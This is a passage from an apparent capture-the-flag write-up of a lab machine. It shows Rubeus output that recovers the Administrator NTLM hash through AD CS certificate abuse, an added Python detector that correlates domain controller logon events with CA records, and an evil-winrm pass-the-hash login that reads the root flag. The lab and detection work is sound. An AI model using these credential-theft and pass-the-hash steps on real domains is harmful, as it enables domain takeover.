wvsT5Z7SNcepufeFquKm3A9+DDwWx20QmphvqB+wYPFq92mxcsVcX0ONVUYNyr5i473MeAylLoRDKDqY
yZnfRiu9Eybw3nWxru50H5/b5hHZF+zdD0HCIhgluSlciHg7Ec+UPbTdOD/c6cDglMk4wp0pzVCa/ol0
Lr47fWE2NqxnXUrUh5UKY69qLvBqZgrX5d3CMguJzuZyujyR1bW5dJgSCI20cFT2klBQc60VzBkKzujo
cNR7iDrkVhYvZbIBH4LNlOft12/WHE2h1Q4P3MEeul0x4K6M6q8fw7YFdN29H8ZhjpfklX5cKJoZaDRd
GP6lfJGqFZ59Ku23n1tkmSSA2Ji6jPbYuG7VR6x6gM2ZfP75rxG1xU79BKNoftSfQvpyO6Ws85FDXaU2
1GUjLaoJmxBMA8rhJzOU4ETW9fBPzAhCA8PV/+Y5cnkcYaD27hPY8oNzkjVx1ziABxkLSOqXtu5dowpN
Qe4jZJsb3Nt1Hu4ZnwrT1RaZdP9XYN3BmYPQG6iuoJW4G1EPjr/cvTeovx61hYPy5FGkz/jzHTPC2ilR
AbTGD79rt68/0Q/qyEKA+RwyrqWhlf1DoZqpnCD9XCv/5C9j02fkiT8cHHb/zg05T8oTsb4WkaZKOMt5
guV4HwdEZlmWq3aDTjF8yy4ZKJfmH3n3BSrPMdjd73gXa1KyjuQ1Q5xo571OTIaCsvX6i5/xGcMWzrfU
zz2p4HbsexeM+O2Dha+Zj1brK9NIX/emzggWOU+n/qGiwajPxr6DawEZX7TkC4zEX2ApVmylf/dKN6he
0jxsXIO9f8xkuMIMUw5Gk95pjVZ3I3Uc8WILQtgKKTq1Y9LIub8OEI/kfhWArxBqIfJRRnjYojVABKbf
Cj8QyKxRa5JYclie3PcoJLFFJe43l5cPQjc/WXihurnp8/q4B9U+GZkcKtCsE9oVzIY6jGt7ecAhvPV+
J/DDaFZtiSOGVOgqjodPU6QwL0RtEHD+g/CDiPJzMKhNEDnKW3zFuMeY3xEWYdeT94RHTqOa7C6ORlIV
a71GkqMYmwM5AJWKvKJr1jB5W/ovha26Zv9deAuMLQsnkW1UzQHBL46YL9G/rYpskI3tgN8dKvPJBnz3
S3GR0w06Lz/neH+Na369JJ6mj2QnqEBunZVmX7wyjNwlq6VwYpZB33OYPr6XY3PE3mirlI0XEcRTLoxs
30/fzamCt1OV9JODkuMz1I8PWtbSe6LBHYYD7GgkJY44NGCxhXlyoc+OtFd/cgdjThs/hQz08zcyTdSh
tUXUMmgX7jbEgF54oKE50KOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIE
EC/paZP0rYJDshTDK4fYqmehDBsKU0VRVUVMLkhUQqIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAADhAAClERgPMjAyNDA0MDMxMzIwMzdaphEYDzIwMjQwNDAzMjMyMDM3WqcRGA8yMDI0MDQxMDEz
MjAzN1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 4/3/2024 6:20:37 AM
EndTime : 4/3/2024 4:20:37 PM
RenewTill : 4/10/2024 6:20:37 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : L+lpk/StgkOyFMMrh9iqZw==
ASREP (key) : EC4663E701CB2C5EE89ABA4EB9AE443F
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
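The two Rubeus runs above are visible to a defender in two places: the domain controller logs a 4768 (TGT requested) event whose certificate fields are populated when PKINIT is used, and the CA database records which account requested the certificate with that serial number. Because the certificate was requested by Ryan.Cooper but the TGT is issued to Administrator, correlating the two sources exposes the mismatch. The following is an added example (not from the original writeup) of that correlation. Event field names follow the 4768 event XML (`TargetUserName`, `CertIssuerName`, `CertSerialNumber`, `CertThumbprint`); CA rows are keyed by the column names `certutil -view -out` accepts (`RequestID`, `RequesterName`, `SerialNumber`, `CertificateTemplate`). All records below are constructed, and the serial number and thumbprint are placeholders, since the issued certificate's values are not shown on the page.

```python
# Added example (not from the original writeup): correlate DC 4768 events with
# the CA database to flag a certificate requested by one account and used to
# obtain a TGT for another. All records are constructed; serial/thumbprint are
# placeholders. Field names follow the 4768 event XML and certutil -view columns.
import csv
import io

PRIVILEGED = {"administrator"}   # accounts that should never log on by certificate here

# Constructed 4768 records, flattened from the event XML. Empty cert fields
# mean a normal password-based AS-REQ; populated fields mean PKINIT.
TGT_EVENTS = [
    {"EventID": "4768", "TargetUserName": "Ryan.Cooper", "IpAddress": "10.10.14.5",
     "CertIssuerName": "", "CertSerialNumber": "", "CertThumbprint": ""},
    {"EventID": "4768", "TargetUserName": "Administrator", "IpAddress": "10.10.11.202",
     "CertIssuerName": "sequel-DC-CA", "CertSerialNumber": "PLACEHOLDER-SERIAL-13",
     "CertThumbprint": "PLACEHOLDER-THUMBPRINT"},
]

# Constructed CA database export (request 13 is the Certify request shown above).
CA_EXPORT = """\
RequestID,RequesterName,SerialNumber,CertificateTemplate
13,SEQUEL\\Ryan.Cooper,placeholder-serial-13,UserAuthentication
"""


def load_ca_rows(csv_text):
    """Index CA database rows by lower-cased serial number."""
    return {r["SerialNumber"].lower(): r for r in csv.DictReader(io.StringIO(csv_text))}


def account(name):
    """'SEQUEL\\Ryan.Cooper' or 'ryan.cooper@sequel.htb' -> 'ryan.cooper'."""
    return name.split("\\")[-1].split("@")[0].lower()


def pkinit_logons(events):
    """4768 events where a certificate, not a password, pre-authenticated the request."""
    return [e for e in events if e["EventID"] == "4768" and e["CertSerialNumber"]]


def detect(events, ca_rows, privileged=PRIVILEGED):
    """Return (account, reason) alerts for suspicious certificate logons."""
    alerts = []
    for e in pkinit_logons(events):
        user = account(e["TargetUserName"])
        if user in privileged:
            alerts.append((user, "privileged account obtained a TGT with a certificate (PKINIT)"))
        row = ca_rows.get(e["CertSerialNumber"].lower())
        if row and account(row["RequesterName"]) != user:
            alerts.append((user,
                           f"certificate requested by {row['RequesterName']} "
                           f"(template {row['CertificateTemplate']}, request {row['RequestID']}) "
                           f"was used to authenticate as {e['TargetUserName']}"))
    return alerts


if __name__ == "__main__":
    for who, why in detect(TGT_EVENTS, load_ca_rows(CA_EXPORT)):
        print(f"[ALERT] {who}: {why}")
```

The requester/subject mismatch is the reliable signal: a legitimate smart-card user requests and uses their own certificate, so the CA's `RequesterName` and the DC's `TargetUserName` agree. The second rule (any PKINIT logon for a privileged account) is a policy check that only holds where those accounts are known not to use certificate logon.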
Establish a remote connection - Administrator
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/3/2024 5:57 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root
Cannot find path 'C:\Users\Administrator\Desktop\root' because it does not exist.
At line:1 char:1
+ type root
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f4137a182926e2b16715f4ff4f332d77
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
References
[Stored procedures - MSSQL](https://book.hacktricks.xyz/pentesting-web/sql-injection/mssql-injection#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures)
[GhostPack-Compiled Binaries](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/)
[AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation)
[From Misconfigured Certificate Template to Domain Admin](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin)
Lessons Learned